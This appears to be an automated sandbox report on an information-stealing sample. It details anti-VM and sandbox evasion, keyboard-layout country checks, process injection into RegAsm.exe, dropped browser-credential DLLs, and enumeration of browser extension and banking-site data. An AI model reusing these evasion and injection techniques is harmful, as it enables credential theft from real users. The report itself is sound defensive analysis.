Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 5832, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\file.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 14D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 3310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 3140000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlm[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 9.3 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040EA01 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040EB14h

4_2_0040EA01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040C094 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040C094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00401140 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	4_2_00401140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040A132 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040A132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004143FD _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	4_2_004143FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040970D _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040970D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00414B02 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	4_2_00414B02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00413DF6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	4_2_00413DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041479E _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	4_2_0041479E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00409B10 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_00409B10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0041418A _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

4_2_0041418A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040EB9D GetSystemInfo,wsprintfA,

4_2_0040EB9D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: HIDBFCBG.4.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: HIDBFCBG.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RegAsm.exe, 00000004.00000002.2403578458.000000000141F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: HIDBFCBG.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: HIDBFCBG.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: HIDBFCBG.4.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: HIDBFCBG.4.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: HIDBFCBG.4.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: HIDBFCBG.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: HIDBFCBG.4.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: HIDBFCBG.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: HIDBFCBG.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: HIDBFCBG.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: HIDBFCBG.4.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000004.00000002.2403578458.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: HIDBFCBG.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: HIDBFCBG.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: HIDBFCBG.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: RegAsm.exe, 00000004.00000002.2403578458.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware}
Source: HIDBFCBG.4.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: HIDBFCBG.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: HIDBFCBG.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: HIDBFCBG.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: HIDBFCBG.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: HIDBFCBG.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: HIDBFCBG.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: HIDBFCBG.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: HIDBFCBG.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: HIDBFCBG.4.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: HIDBFCBG.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: HIDBFCBG.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: HIDBFCBG.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: HIDBFCBG.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: HIDBFCBG.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_4-79440

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0041777F memset,__call_reportfault,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0041777F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

4_2_00415745

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00401000 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,

4_2_00401000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041777F memset,__call_reportfault,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0041777F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041C858 SetUnhandledExceptionFilter,	4_2_0041C858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00418CA7 __call_reportfault,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00418CA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBFB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6CBFB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBFB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6CBFB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CE0AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6CE0AC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: file.exe, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "FreeConsole")
Source: file.exe, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "FreeConsole")
Source: file.exe, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_0331211D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

1_2_0331211D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040FED2 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

4_2_0040FED2

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 420000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63F000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F9B008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_6CBFB341 cpuid

4_2_6CBFB341

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

4_2_0040EA01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040F870 _EH_prolog,GetSystemTime,

4_2_0040F870

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040E8E7 GetProcessHeap,HeapAlloc,GetUserNameA,

4_2_0040E8E7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040E9AE GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

4_2_0040E9AE

